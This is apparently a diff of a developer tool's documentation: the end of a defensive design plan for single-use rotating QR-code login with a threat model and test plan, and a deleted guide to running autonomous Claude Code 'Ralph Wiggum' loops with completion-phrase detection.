addListener('tunnel:qrAuthUsed', (data) => {
|
||||
showNotificationToast(
|
||||
`Device authenticated via QR (${parseUAFamily(data.ua)}, ${data.ip}). Not you?`,
|
||||
{
|
||||
duration: 10000,
|
||||
action: { label: 'Revoke', onClick: () => revokeAllSessions() },
|
||||
}
|
||||
);
|
||||
});
|
||||
|
||||
// In showTunnelQR(), after fetching /api/tunnel/qr:
|
||||
if (data.authEnabled) {
|
||||
const badge = document.createElement('div');
|
||||
badge.textContent = 'Single-use auth \u00b7 refreshes every 60s';
|
||||
badge.style.cssText = 'margin-top:8px;font-size:11px;color:var(--text-secondary)';
|
||||
container.parentElement.appendChild(badge);
|
||||
}
|
||||
```
|
||||
|
||||
#### Welcome Screen QR
|
||||
|
||||
Same auto-refresh behavior applies to `_updateWelcomeTunnelBtn()` — the QR is fetched from `/api/tunnel/qr` so token embedding happens automatically.
|
||||
|
||||
### 7. SSE Events
|
||||
|
||||
Three events for the frontend. QR rotation events embed the SVG directly in the payload to eliminate an extra HTTP fetch — the desktop gets the new QR in a single SSE push (~2-5KB SVG, well within SSE limits).
|
||||
|
||||
```typescript
|
||||
// In server.ts, listen for tunnelManager events:
|
||||
|
||||
// Auto-rotation every 60s — desktop refreshes QR silently (SVG inline)
|
||||
tunnelManager.on('qrTokenRotated', async () => {
|
||||
const url = tunnelManager.getUrl();
|
||||
if (url && process.env.CODEMAN_PASSWORD) {
|
||||
const svg = await tunnelManager.getQrSvg(url);
|
||||
broadcast('tunnel:qrRotated', { svg });
|
||||
} else {
|
||||
broadcast('tunnel:qrRotated', {});
|
||||
}
|
||||
});
|
||||
|
||||
// Manual regeneration or post-consumption — desktop refreshes QR (SVG inline)
|
||||
tunnelManager.on('qrTokenRegenerated', async () => {
|
||||
const url = tunnelManager.getUrl();
|
||||
if (url && process.env.CODEMAN_PASSWORD) {
|
||||
const svg = await tunnelManager.getQrSvg(url);
|
||||
broadcast('tunnel:qrRegenerated', { svg });
|
||||
} else {
|
||||
broadcast('tunnel:qrRegenerated', {});
|
||||
}
|
||||
});
|
||||
|
||||
// QR auth consumed — desktop shows notification toast (QRLjacking detection)
|
||||
// Note: this is broadcast from the route handler, not tunnelManager
|
||||
// Event: tunnel:qrAuthUsed { ip, ua, timestamp }
|
||||
```
|
||||
|
||||
### 8. Session Cookie Binding & Revocation
|
||||
|
||||
Enhance session records to include device context for audit purposes. The UA is stored for **logging only** — not for blocking.
|
||||
|
||||
**Why no UA-family blocking (`majorUAChanged`)?** Security review found this is security theater:
|
||||
- UA strings are trivially spoofable by any attacker who can steal a cookie
|
||||
- Chrome UA reduction (2022+) makes family detection unreliable
|
||||
- Mobile WebView → browser switches trigger false positives on the same device
|
||||
- HttpOnly + Secure + SameSite=lax + 24h TTL already protect against cookie theft
|
||||
- The attacker who can exfiltrate a cookie can also replay the exact UA
|
||||
|
||||
Instead, provide **manual session revocation** as the active defense:
|
||||
|
||||
```typescript
|
||||
// Session record stores device context for audit logging (not blocking):
|
||||
ctx.authState.authSessions?.set(sessionToken, {
|
||||
ip: clientIp,
|
||||
ua: req.headers['user-agent'] ?? '',
|
||||
createdAt: Date.now(),
|
||||
method: 'qr', // 'qr' | 'basic' — tracks how session was created
|
||||
});
|
||||
|
||||
// Manual revocation endpoint — kill specific session or all sessions
|
||||
app.post('/api/auth/revoke', async (req, reply) => {
|
||||
const { sessionToken: target } = req.body as { sessionToken?: string };
|
||||
if (target) {
|
||||
ctx.authState.authSessions?.delete(target);
|
||||
} else {
|
||||
// Revoke all sessions (nuclear option)
|
||||
ctx.authState.authSessions?.clear();
|
||||
}
|
||||
return { success: true };
|
||||
});
|
||||
```
|
||||
|
||||
**Note**: This is a breaking type change. The `AuthState` interface must be updated from `StaleExpirationMap<string, string>` (token → clientIp) to `StaleExpirationMap<string, { ip, ua, createdAt, method }>`. All session validation code in `auth.ts` must be updated simultaneously.
|
||||
|
||||
### 9. Cleanup — `src/tunnel-manager.ts`
|
||||
|
||||
Stop the rotation timer in the `stop()` method:
|
||||
|
||||
```typescript
|
||||
stop(): void {
|
||||
this.stopRotation();
|
||||
// ... existing cleanup
|
||||
}
|
||||
```
|
||||
|
||||
## Security Analysis
|
||||
|
||||
### Threat Model
|
||||
|
||||
| Threat | Attack Vector | Mitigation | Residual Risk |
|
||||
|--------|--------------|------------|---------------|
|
||||
| **QR screenshot shared** | Attacker gets image of QR code | Single-use: token consumed on first scan. 60s TTL: expired by the time attacker tries. Desktop toast notification alerts user if someone else scans. | If attacker scans faster than legitimate user (~seconds), they win the race. Low risk: requires physical proximity + speed. User sees notification and can revoke. |
|
||||
| **Cloudflare edge logs** | Cloudflare logs the full URL path | Short code is opaque (6-char lookup key), not the real token. Single-use: replaying from logs always fails. 60s TTL (90s grace): expired before log review. `trycloudflare.com` quick tunnels have no customer-accessible logging controls — the privacy implications are inherent to using free quick tunnels. | Cloudflare has TLS termination access regardless. Ephemeral short codes are far less valuable than a permanent token. |
|
||||
| **Brute force short code** | Attacker guesses `/q/XXXXXX` | Per-IP rate limiting (10/IP/15min) + global path rate limit (30/min across all IPs). 62^6 = 56.8 billion combinations. Only ~2 valid codes at any time. | Infeasible: expected guesses to hit = ~2.8×10^10, rate limits block well before. |
|
||||
| **Replay attack** | Reuse a previously valid URL | Single-use consumption + 60s TTL (90s grace). Old codes always 401. | None — replay is impossible by design. |
|
||||
| **QRLjacking** | Attacker displays your QR on phishing site | No companion app = limited mitigation. However: 60s rotation means attacker must relay in real-time. Desktop toast notification ("Device [IP] authenticated via QR. Not you? [Revoke]") provides real-time detection. Self-hosted single-user context makes phishing implausible. | Theoretical risk for multi-user deployments. Mitigated by notification toast for single-user. Note: Signal's linked-device QR flow was exploited by Russian state actors (UNC5792/Sandworm) via quishing in 2025 — but that targeted a multi-user messaging platform, not a self-hosted dev tool. |
|
||||
| **Session cookie theft** | XSS or network sniffing steals cookie | HttpOnly + Secure flags. SameSite=lax prevents CSRF. 24h TTL limits exposure window. Manual revocation via `/api/auth/revoke`. | Standard web cookie risks apply. Mitigated by security headers (CSP, etc.). |
|
||||
| **Token in server logs** | Access log captures URL path | Log `/q/*` with short code masked or omitted. Configure Fastify logger to redact `/q/` paths. | Path still appears in server access logs (mitigated by masking). |
|
||||
| **Timing attack** | Measure response time to leak short code | Map-based lookup (`Map.get()`) — hash-based O(1), no character-by-character timing leak. No string comparison in the hot path. | None — timing side channel eliminated by design. |
|
||||
| **Token not in query params** | N/A (this is a mitigation) | Short code in URL path avoids browser history, Referer headers, and address bar exposure. | Path still appears in server access logs (mitigated by masking). |
|
||||
| **Distributed brute force** | Multiple IPs guess codes simultaneously | Global rate limit (30/min total across all IPs) in addition to per-IP limit. | Infeasible given keyspace. Global limit prevents botnet-scale attempts. |
|
||||
| **CSRF on regenerate** | Cross-origin POST to `/api/tunnel/qr/regenerate` | SameSite=lax cookies are NOT sent with cross-origin POST requests, providing CSRF protection. Endpoint requires authenticated session. | Verify SameSite=lax behavior through cloudflared tunnel. |
|
||||
|
||||
### USENIX Security 2025 Flaw Coverage
|
||||
|
||||
The [Zhang et al. paper](https://www.usenix.org/conference/usenixsecurity25/presentation/zhang-xin) (USENIX Security 2025, 47 of top-100 websites vulnerable, 42 CVEs) identified 6 critical design flaws. Coverage:
|
||||
|
||||
| USENIX Flaw | Status | Implementation |
|
||||
|-------------|--------|----------------|
|
||||
| Flaw-1: Missing single-use enforcement | **Fixed** | Atomic `consumed` flag, Map-based lookup |
|
||||
| Flaw-2: Long-lived tokens | **Fixed** | 60s TTL, 90s grace, auto-rotation |
|
||||
| Flaw-3: Predictable QrId generation | **Fixed** | `crypto.randomBytes(32)` — 256-bit entropy, rejection-sampled short codes |
|
||||
| Flaw-4: Client-side QrId generation | **Fixed** | Server-side generation only |
|
||||
| Flaw-5: Missing status notification | **Fixed** | Desktop toast notification via `tunnel:qrAuthUsed` SSE event. Shows device IP/UA with [Revoke] button. |
|
||||
| Flaw-6: Inadequate session binding | **Partial** | IP + UA stored for audit. No cryptographic channel binding (requires companion app / FIDO2 — overkill for single-user). Manual revocation as active defense. |
|
||||
|
||||
### Industry Comparison
|
||||
|
||||
| Platform | Model | How This Plan Compares |
|
||||
|----------|-------|----------------------|
|
||||
| **Discord** | Long-lived session token, no confirmation, repeatedly exploited via QRLjacking | **Better** — single-use + TTL + notification toast |
|
||||
| **WhatsApp Web** | Pre-authenticated phone confirms "Link device?", ~60s rotation | **Comparable** rotation model; missing WhatsApp's explicit confirmation prompt (acceptable: single-user, no account selection) |
|
||||
| **Signal** | Ephemeral public key in QR, E2E encrypted channel via Signal protocol | **Below** — no cryptographic channel binding. Note: Signal's QR flow was exploited by state actors in 2025 despite stronger crypto, showing that protocol strength alone doesn't prevent social engineering. |
|
||||
| **1Password** | Noise framework E2E channel, post-quantum pre-shared keys, confirmation codes | **Below** — but 1Password is a credential manager with different threat model. Overkill for a dev tool. |
|
||||
| **FIDO2 CTAP 2.2** | BLE proximity + cryptographic binding + biometric verification | **Below** — but requires BLE stack, FIDO server, and companion authenticator. Completely inappropriate here. |
|
||||
|
||||
### Comparison to Prior Design
|
||||
|
||||
| Property | Original Plan | Current Plan |
|
||||
|----------|--------------|--------------|
|
||||
| Token TTL | Infinite (until restart) | 60 seconds (90s grace for previous token) |
|
||||
| Reuse | Multi-use (same QR works forever) | Single-use (consumed atomically on first scan) |
|
||||
| Secret in URL | Query param (`?t=64-char-hex`) | Opaque short code in path (`/q/Xk9mQ3`) |
|
||||
| Leak impact | Permanent access until manual revoke | Worthless after first use or 90s, whichever comes first |
|
||||
| Desktop QR refresh | Manual only | Auto-refresh every 60s via SSE with inline SVG |
|
||||
| Session binding | IP only | IP + UA stored for audit (not blocking). Manual revocation endpoint. |
|
||||
| Auth notification | None | Desktop toast: "Device [IP] authenticated via QR. Not you? [Revoke]" |
|
||||
| Audit logging | None | `session-lifecycle.jsonl` entry on every QR auth event |
|
||||
| Rate limiting | Per-IP only, shared with Basic Auth | Per-IP (separate counter) + global path limit (30/min) |
|
||||
| Short code generation | Modulo-biased | Rejection-sampled (no bias) |
|
||||
| Short code lookup | Array scan (timing leak) | Map-based O(1) (timing-safe) |
|
||||
| Connect latency | ~50ms (localhost only) | ~150-300ms through Cloudflare tunnel (honest estimate) |
|
||||
|
||||
### What This Does NOT Protect Against
|
||||
|
||||
- **FIDO2/passkey-level phishing resistance**: Would require BLE proximity verification and cryptographic channel binding. Overkill for a self-hosted single-user dev tool. The FIDO2 CTAP 2.2 hybrid transport is the gold standard but requires BLE hardware and a companion authenticator.
|
||||
- **Compromised phone**: If the attacker has physical access to the phone that scans, no QR scheme helps.
|
||||
- **Compromised Cloudflare tunnel**: Cloudflare terminates TLS and can inspect all traffic. This is inherent to using `trycloudflare.com` quick tunnels — use `--https` for end-to-end encryption if this matters.
|
||||
- **State-sponsored quishing**: Sophisticated attackers could create convincing phishing pages that relay the QR in real-time. The 60s rotation and desktop notification toast mitigate this for the single-user case, but a dedicated attacker with social engineering could theoretically succeed within the TTL window.
|
||||
|
||||
### Standards Compliance Note
|
||||
|
||||
This design is **inspired by but does not conform to** [OASIS SQRAP v1.0](https://docs.oasis-open.org/esat/sqrap/v1.0/cs01/sqrap-v1.0-cs01.html). SQRAP's architecture requires a companion mobile app with stored identity keys, public key channel binding, back-channel authentication, and user presence verification (biometric/PIN). These are fundamentally incompatible with a browser-scan-to-authenticate flow. SQRAP is referenced for awareness of formal QR auth standards, not as a compliance target.
|
||||
|
||||
## Performance
|
||||
|
||||
The design prioritizes speed on connect. Latency depends on whether the request goes through a Cloudflare tunnel or is localhost:
|
||||
|
||||
### Localhost (no tunnel)
|
||||
|
||||
| Step | Latency |
|
||||
|------|---------|
|
||||
| QR scan (physical) | ~1-2s (user action) |
|
||||
| `GET /q/:code` → Map.get() lookup + consume | <1ms |
|
||||
| Cookie set + 302 redirect | <1ms |
|
||||
| Browser follows redirect to `/` | <5ms |
|
||||
| **Total (after scan)** | **<10ms** |
|
||||
|
||||
### Through Cloudflare Tunnel (typical mobile use case)
|
||||
|
||||
Each request traverses: phone → Cloudflare edge (TLS termination) → cloudflared → localhost. The 302 redirect means **two full round trips** through the tunnel.
|
||||
|
||||
| Step | Latency |
|
||||
|------|---------|
|
||||
| QR scan (physical) | ~1-2s (user action) |
|
||||
| DNS resolution for `*.trycloudflare.com` | 20-80ms (first request, cached after) |
|
||||
| TLS handshake to Cloudflare edge | 50-100ms (first request, 0 with TLS resumption) |
|
||||
| `GET /q/:code` through tunnel (request + response) | 30-90ms |
|
||||
| Browser follows 302 redirect: `GET /` through tunnel | 30-90ms |
|
||||
| **Total first connection (cold)** | **~200-400ms** |
|
||||
| **Total subsequent (TLS/DNS cached)** | **~100-200ms** |
|
||||
|
||||
This is still fast — **imperceptible after the 1-2s physical QR scan action**. For comparison, VS Code Remote Tunnels (through Azure) adds 20-100ms per hop.
|
||||
|
||||
### Why Not Eliminate the Redirect?
|
||||
|
||||
The 302 means two round trips. Alternatives considered:
|
||||
- **200 + serve `index.html` directly**: URL bar shows `/q/Xk9mQ3`, relative paths break, couples auth to static serving. Not worth the complexity.
|
||||
- **200 + `<meta http-equiv="refresh">`**: Still two requests, plus HTML parse delay. Actually slower.
|
||||
- **200 + JavaScript redirect**: Same problem, plus fails if JS disabled.
|
||||
|
||||
The 302 is clean, universally supported, and the extra 30-90ms is invisible to users.
|
||||
|
||||
### QR Code Size Optimization
|
||||
|
||||
The URL `https://xxx-yyy.trycloudflare.com/q/Xk9mQ3` is ~53-56 characters. At QR Error Correction Level M:
|
||||
|
||||
| QR Version | Grid Size | Byte Capacity | Fits? |
|
||||
|------------|-----------|---------------|-------|
|
||||
| Version 3 | 29x29 | 42 bytes | No |
|
||||
| Version 4 | 33x33 | 62 bytes | Yes (comfortably) |
|
||||
| Version 5 | 37x37 | 84 bytes | Yes |
|
||||
|
||||
The shortened `/q/` path (vs `/qr-auth/`) and 6-char code (vs 8-char) save 9 bytes, targeting Version 4 (33x33) for faster scanning on budget Android phones. Modern phones scan Version 4 QR codes in 100-300ms — the user action of pointing the camera dominates.
|
||||
|
||||
### Desktop QR Refresh
|
||||
|
||||
Token rotation SSE events now embed the SVG directly in the payload (~2-5KB). The desktop gets the new QR in a single SSE push — no extra HTTP fetch needed. Refresh latency: **sub-50ms** (SSE adaptive batching at 16-50ms).
|
||||
|
||||
### SVG Caching
|
||||
|
||||
QR SVG is cached per rotation cycle on `TunnelManager.cachedQrSvg`. The SVG is regenerated only when the token rotates (every 60s), not on every `/api/tunnel/qr` request. SVG format is optimal: resolution-independent (retina-safe), inline-able (no extra HTTP request), ~2-5KB, renders in <1ms.
|
||||
|
||||
## Edge Cases
|
||||
|
||||
1. **Scan during rotation**: The server keeps 2 tokens (current + previous). If the user scans right as rotation happens, the previous token is still valid for up to 60s more. Seamless.
|
||||
|
||||
2. **Server restart**: All tokens cleared (in-memory). New token generated immediately. Tunnel URL also changes (trycloudflare gives a new subdomain), so old QR codes are doubly dead.
|
||||
|
||||
3. **Multiple devices**: Each scan consumes the token and triggers a fresh one. To auth a second device, wait for the QR to refresh (≤60s) or hit "Regenerate QR" on the desktop, then scan the new code.
|
||||
|
||||
4. **Token without tunnel**: `/qr-auth/:code` works even on localhost. If you have the code and it's valid, you get authenticated regardless of access method.
|
||||
|
||||
5. **Tunnel restart (same server)**: Tokens survive tunnel restarts (stored on `TunnelManager` instance). But new tunnel URL = new QR code generated. Short code stays valid until consumed or expired.
|
||||
|
||||
6. **Desktop browser closed during scan**: Token is consumed server-side. The scanning phone gets authenticated. When the desktop reopens, SSE reconnects and shows a fresh QR. No state corruption.
|
||||
|
||||
7. **Race condition: two phones scan same QR**: First scanner wins (atomic `consumed = true`). Second scanner gets 401. This is correct behavior — single-use by design.
|
||||
|
||||
## Files to Modify
|
||||
|
||||
| File | Changes |
|
||||
|------|---------|
|
||||
| `src/tunnel-manager.ts` | `QrTokenRecord` type, `Map<shortCode, record>` token pool, rejection-sampled `generateShortCode()`, rotation timer, `consumeToken()`, `getCurrentShortCode()`, `getQrSvg()` (cached), `regenerateQrToken()`, global rate limit counter, cleanup in `stop()` |
|
||||
| `src/web/middleware/auth.ts` | Add `/q/` bypass in `onRequest` hook. Enhance session record type from `string` to `{ ip, ua, createdAt, method }` (**breaking type change** — all consumers must update). Add `qrAuthFailures` StaleExpirationMap (separate from Basic Auth `authFailures`). |
|
||||
| `src/web/routes/system-routes.ts` | Modify `/api/tunnel/qr` to use `getQrSvg()` cache. Add `GET /q/:code` with atomic consume, audit log, and `tunnel:qrAuthUsed` broadcast. Add `POST /api/tunnel/qr/regenerate`. Add `POST /api/auth/revoke`. |
|
||||
| `src/web/server.ts` | Pass `authState` + `lifecycleLog` to route context. Listen for `qrTokenRotated` and `qrTokenRegenerated` events → broadcast SSE with inline SVG. |
|
||||
| `src/web/public/app.js` | Auto-refresh QR from inline SSE SVG payload (no extra fetch). Countdown timer. Regenerate button. Auth badge. Auth notification toast on `tunnel:qrAuthUsed` with [Revoke] action. |
|
||||
| `src/session-lifecycle-log.ts` | Add `qr_auth` event type to lifecycle log schema |
|
||||
| `src/types/api.ts` | Update `AuthState` interface: `authSessions` value type, add `qrAuthFailures` map |
|
||||
|
||||
## Complexity Estimate
|
||||
|
||||
Medium change. Core logic (Map-based token pool, rejection-sampled short codes, SVG cache, atomic consumption, cookie issuance, audit logging) is ~120 lines. Rate limiting (separate QR counter + global path limit) adds ~20 lines. SSE plumbing with inline SVG adds ~30 lines. Frontend (inline SVG refresh, auth notification toast with revoke, countdown) is ~40 lines. Auth type migration (session record type change) touches ~10 lines across middleware. No new dependencies — `crypto` and `qrcode` are already available.
|
||||
|
||||
## Testing
|
||||
|
||||
### Automated
|
||||
|
||||
```bash
|
||||
# Unit test for token manager
|
||||
npx vitest run test/qr-auth.test.ts
|
||||
```
|
||||
|
||||
Test cases:
|
||||
- Token rotation generates unique short codes (6-char, base62)
|
||||
- Short codes have uniform character distribution (no modulo bias — verify with chi-squared test over 10K samples)
|
||||
- `consumeToken()` returns true on first use, false on second
|
||||
- Expired tokens (>90s old) return false
|
||||
- Previous token still works during 90s grace period
|
||||
- Token at exactly 60s still valid (within grace), token at 91s rejected
|
||||
- `regenerateQrToken()` invalidates all existing tokens (Map cleared)
|
||||
- Short code lookup is case-sensitive
|
||||
- Per-IP rate limiting increments on invalid codes (separate from Basic Auth counter)
|
||||
- Global rate limit (30/min) blocks attempts across all IPs
|
||||
- SVG cache returns same string for same short code, regenerates on rotation
|
||||
- Audit log entry written on successful QR auth
|
||||
- `tunnel:qrAuthUsed` SSE event broadcast on successful QR auth
|
||||
- `tunnel:qrRotated` SSE event includes inline SVG payload
|
||||
- Map-based lookup does not leak timing information (no string comparison in hot path)
|
||||
|
||||
### Manual
|
||||
|
||||
1. Start server with `CODEMAN_PASSWORD=test`
|
||||
2. Enable tunnel
|
||||
3. Verify `/api/tunnel/qr` returns QR encoding `https://...trycloudflare.com/q/Xk9mQ3`
|
||||
4. Open the QR URL in incognito → should auto-redirect to `/` with session cookie
|
||||
5. Verify desktop shows notification toast: "Device [IP] authenticated via QR"
|
||||
6. Open the **same** URL again → should get 401 (single-use consumed)
|
||||
7. Wait 60s → verify QR display auto-updated (new short code, inline SVG via SSE)
|
||||
8. Open just the tunnel URL → should get Basic Auth prompt
|
||||
9. Call `POST /api/tunnel/qr/regenerate` → old QR URL returns 401, new QR appears
|
||||
10. Verify per-IP rate limiting: 10+ failed `/q/badcode` → 429
|
||||
11. Verify Basic Auth failures don't consume QR rate limit budget (and vice versa)
|
||||
12. Check `~/.codeman/session-lifecycle.jsonl` for `qr_auth` entries after successful scan
|
||||
13. Click [Revoke] on the notification toast → verify session is invalidated
|
||||
|
||||
## References
|
||||
|
||||
- [USENIX Security 2025: "Demystifying the (In)Security of QR Code-based Login in Real-world Deployments"](https://www.usenix.org/conference/usenixsecurity25/presentation/zhang-xin) — 6 design flaws, 5 attack types, 42 CVEs across 47 of top-100 websites. Primary design reference for this plan.
|
||||
- [OWASP QRLJacking](https://owasp.org/www-community/attacks/Qrljacking) — canonical QR session hijacking reference
|
||||
- [OASIS SQRAP v1.0 Standard](https://docs.oasis-open.org/esat/sqrap/v1.0/cs01/sqrap-v1.0-cs01.html) — formal standard for secure QR authentication. **Not a compliance target** for this plan (requires companion app + PKI). Referenced for awareness only.
|
||||
- [FIDO2 CTAP 2.2 Hybrid Transport](https://fidoalliance.org/specs/fido-v2.2-rd-20230321/fido-client-to-authenticator-protocol-v2.2-rd-20230321.html) — gold standard for cross-device auth (overkill for this use case)
|
||||
- [Google GTIG: Signal QR quishing by Russian state actors (2025)](https://cloud.google.com/blog/topics/threat-intelligence/russia-targeting-signal-messenger) — UNC5792/Sandworm exploited Signal's linked-device QR flow via phishing. Demonstrates that even cryptographically strong QR auth can be defeated by social engineering.
|
||||
- [CVE-2026-2144: Magic Login QR Code Plugin race condition](https://www.cvedetails.com/cve/CVE-2026-2144/) — QR token stored as predictable static file, race window between creation and deletion. Validates this plan's in-memory-only approach.
|
||||
@@ -1,846 +0,0 @@
|
||||
# Ralph Wiggum Loop: Complete Guide
|
||||
|
||||
> This document consolidates official Anthropic documentation, community best practices, and implementation details for autonomous Claude Code loops.
|
||||
|
||||
**Last Updated**: 2026-01-24
|
||||
**Sources**: [Official Anthropic Plugin](https://github.com/anthropics/claude-code/tree/main/plugins/ralph-wiggum), [Claude Code Docs](https://code.claude.com/docs/en/hooks), [Claude Code Best Practices](https://www.anthropic.com/engineering/claude-code-best-practices)
|
||||
|
||||
---
|
||||
|
||||
## Table of Contents
|
||||
|
||||
1. [Overview](#overview)
|
||||
2. [Core Concept](#core-concept)
|
||||
3. [Official Plugin Reference](#official-plugin-reference)
|
||||
4. [The Promise Tag Contract](#the-promise-tag-contract)
|
||||
5. [TodoWrite Tool Integration](#todowrite-tool-integration)
|
||||
6. [Hooks System](#hooks-system)
|
||||
7. [Best Practices](#best-practices)
|
||||
8. [Prompt Templates](#prompt-templates)
|
||||
9. [When to Use (and Not Use)](#when-to-use-and-not-use)
|
||||
10. [Real-World Examples](#real-world-examples)
|
||||
11. [Codeman Implementation](#codeman-implementation)
|
||||
12. [Troubleshooting](#troubleshooting)
|
||||
|
||||
---
|
||||
|
||||
## Overview
|
||||
|
||||
Ralph Wiggum is an autonomous loop technique for Claude Code, named after The Simpsons character. It enables Claude to work iteratively on tasks for hours without human intervention, self-correcting until completion criteria are met.
|
||||
|
||||
**Core Philosophy**:
|
||||
- **Iteration > Perfection**: Don't aim for perfect on first try; let the loop refine
|
||||
- **Failures Are Data**: "Deterministically bad" means failures are predictable and informative
|
||||
- **Operator Skill Matters**: Success depends on writing good prompts, not just having a good model
|
||||
- **Persistence Wins**: Keep trying until success; the loop handles retry logic
|
||||
|
||||
**Origin**: Created by Geoffrey Huntley, formalized into an official Anthropic plugin by Boris Cherny (Head of Claude Code) in late 2025.
|
||||
|
||||
---
|
||||
|
||||
## Core Concept
|
||||
|
||||
The simplest form of a Ralph loop:
|
||||
|
||||
```bash
|
||||
while :; do cat PROMPT.md | claude ; done
|
||||
```
|
||||
|
||||
**How It Works**:
|
||||
1. Claude processes a task prompt
|
||||
2. Attempts to exit when "done"
|
||||
3. A **Stop hook** intercepts the exit
|
||||
4. Checks for **completion promise** (e.g., `<promise>COMPLETE</promise>`)
|
||||
5. If not found, re-feeds the same prompt
|
||||
6. Files from previous iteration persist, so Claude sees its own work
|
||||
7. Cycle repeats until completion or max iterations reached
|
||||
|
||||
**Key insight**: The prompt never changes between iterations, but Claude's previous work persists in files, allowing autonomous improvement by reading past work.
|
||||
|
||||
---
|
||||
|
||||
## Official Plugin Reference
|
||||
|
||||
### Installation
|
||||
|
||||
```bash
|
||||
# Add Anthropic's official plugin marketplace
|
||||
/plugin marketplace add anthropics/claude-plugins-official
|
||||
|
||||
# Install Ralph Wiggum plugin
|
||||
/plugin install ralph-wiggum@claude-plugins-official
|
||||
```
|
||||
|
||||
### Commands
|
||||
|
||||
#### `/ralph-loop:ralph-loop`
|
||||
|
||||
Start an autonomous loop in the current session.
|
||||
|
||||
```bash
|
||||
/ralph-loop:ralph-loop
|
||||
```
|
||||
|
||||
When invoked, this skill prompts you to configure:
|
||||
- **Task prompt**: The work to be done (persists across iterations)
|
||||
- **Max iterations**: Safety limit on iterations (recommended: always set this)
|
||||
- **Completion promise**: The phrase that signals completion (e.g., `COMPLETE`)
|
||||
|
||||
#### `/ralph-loop:cancel-ralph`
|
||||
|
||||
Cancel the active Ralph loop.
|
||||
|
||||
```bash
|
||||
/ralph-loop:cancel-ralph
|
||||
```
|
||||
|
||||
#### `/ralph-loop:help`
|
||||
|
||||
Show help and usage information.
|
||||
|
||||
```bash
|
||||
/ralph-loop:help
|
||||
```
|
||||
|
||||
### State File
|
||||
|
||||
The plugin persists state to `.claude/ralph-loop.local.md`:
|
||||
|
||||
```yaml
|
||||
---
|
||||
enabled: true
|
||||
iteration: 5
|
||||
max-iterations: 50
|
||||
completion-promise: "COMPLETE"
|
||||
---
|
||||
# Original Prompt
|
||||
|
||||
Build a REST API for todos...
|
||||
```
|
||||
|
||||
**YAML Fields**:
|
||||
- `enabled` (boolean): Controls hook activation
|
||||
- `iteration` (integer): Current iteration count (0-indexed)
|
||||
- `max-iterations` (integer): Optional maximum
|
||||
- `completion-promise` (string): Optional completion text
|
||||
|
||||
---
|
||||
|
||||
## The Promise Tag Contract
|
||||
|
||||
The completion phrase pattern is the core contract between Claude and the loop system:
|
||||
|
||||
```
|
||||
<promise>PHRASE</promise>
|
||||
```
|
||||
|
||||
**Examples**:
|
||||
- `<promise>COMPLETE</promise>` - Generic completion
|
||||
- `<promise>TESTS_PASS</promise>` - Test-specific completion
|
||||
- `<promise>TIME_COMPLETE</promise>` - Time-aware loop completion
|
||||
- `<promise>FIXED</promise>` - Bug fix completion
|
||||
|
||||
### How Completion Detection Works
|
||||
|
||||
1. **Exact String Matching**: The `--completion-promise` uses case-sensitive exact matching
|
||||
2. **Output Scanning**: The Stop hook scans Claude's final output for the promise tag
|
||||
3. **Exit Control**: If found, exit is allowed. If not, loop continues.
|
||||
|
||||
### False Positive Prevention
|
||||
|
||||
The official implementation (and Codeman) prevents false positives when completion phrases appear in:
|
||||
- Initial prompts
|
||||
- Documentation or examples
|
||||
- Comments
|
||||
|
||||
**Solution**: Codeman uses **occurrence-based detection** to distinguish prompts from actual completions:
|
||||
- **1st occurrence**: Store as expected phrase (likely in the prompt)
|
||||
- **2nd occurrence**: Emit `completionDetected` (actual completion)
|
||||
- **If loop already active**: Emit immediately (explicit loop start via `/ralph-loop:ralph-loop`)
|
||||
|
||||
```typescript
|
||||
// From codeman/src/ralph-tracker.ts
|
||||
private handleCompletionPhrase(phrase: string): void {
|
||||
const count = (this._completionPhraseCount.get(phrase) || 0) + 1;
|
||||
this._completionPhraseCount.set(phrase, count);
|
||||
|
||||
// Store phrase on first occurrence
|
||||
if (!this._loopState.completionPhrase) {
|
||||
this._loopState.completionPhrase = phrase;
|
||||
this._loopState.lastActivity = Date.now();
|
||||
this.emit('loopUpdate', this.loopState);
|
||||
}
|
||||
|
||||
// Emit completion if loop is active OR this is 2nd+ occurrence
|
||||
if (this._loopState.active || count >= 2) {
|
||||
this._loopState.active = false;
|
||||
this._loopState.lastActivity = Date.now();
|
||||
this.emit('completionDetected', phrase);
|
||||
this.emit('loopUpdate', this.loopState);
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
This approach handles both scenarios:
|
||||
1. **Explicit loop start**: User runs `/ralph-loop:ralph-loop`, loop is active, first completion phrase triggers
|
||||
2. **Implicit completion**: Phrase appears in prompt (1st), then Claude outputs it on completion (2nd)
|
||||
|
||||
---
|
||||
|
||||
## TodoWrite Tool Integration
|
||||
|
||||
The **TodoWrite tool** is Claude Code's built-in task management system that integrates with Ralph loops.
|
||||
|
||||
### How It Works
|
||||
|
||||
Claude uses TodoWrite to:
|
||||
1. Break complex tasks into subtasks
|
||||
2. Track progress through iterations
|
||||
3. Provide visibility into current state
|
||||
4. Resume work after context resets
|
||||
|
||||
### Todo Formats Detected
|
||||
|
||||
**Format 1: Markdown Checkboxes**
|
||||
```markdown
|
||||
- [ ] Pending task
|
||||
- [x] Completed task
|
||||
- [X] Completed task (uppercase)
|
||||
```
|
||||
|
||||
**Format 2: Status Indicators**
|
||||
```
|
||||
Todo: ☐ Pending task
|
||||
Todo: ◐ In progress task
|
||||
Todo: ✓ Completed task
|
||||
```
|
||||
|
||||
**Format 3: Parenthetical Status**
|
||||
```
|
||||
- Task name (pending)
|
||||
- Task name (in_progress)
|
||||
- Task name (completed)
|
||||
```
|
||||
|
||||
**Format 4: Native Checkboxes (without "Todo:" prefix)**
|
||||
```
|
||||
☐ Pending task
|
||||
◐ In progress task
|
||||
☒ Completed task
|
||||
```
|
||||
|
||||
**Format 5: Claude Code Checkmark-Based TodoWrite Output**
|
||||
```
|
||||
✔ Task #1 created: Fix the authentication bug
|
||||
✔ #1 Fix the authentication bug
|
||||
✔ Task #1 updated: status → in progress
|
||||
✔ Task #1 updated: status → completed
|
||||
```
|
||||
|
||||
This is the primary output format used by Claude Code's TodoWrite tool in CLI sessions. The tracker maps task numbers to content, allowing status updates to reference tasks by number.
|
||||
|
||||
### System Reminder Integration
|
||||
|
||||
From official Claude Code documentation:
|
||||
|
||||
> After commands like an ls -la run via bash tool, system-reminder tags are injected to remind the model to use the TodoWrite tool if it hasn't been using it so far.
|
||||
|
||||
The system prompt includes:
|
||||
> "IMPORTANT: Always use the TodoWrite tool to plan and track tasks throughout the conversation."
|
||||
|
||||
### Checklists for Complex Workflows
|
||||
|
||||
From [Anthropic Best Practices](https://www.anthropic.com/engineering/claude-code-best-practices):
|
||||
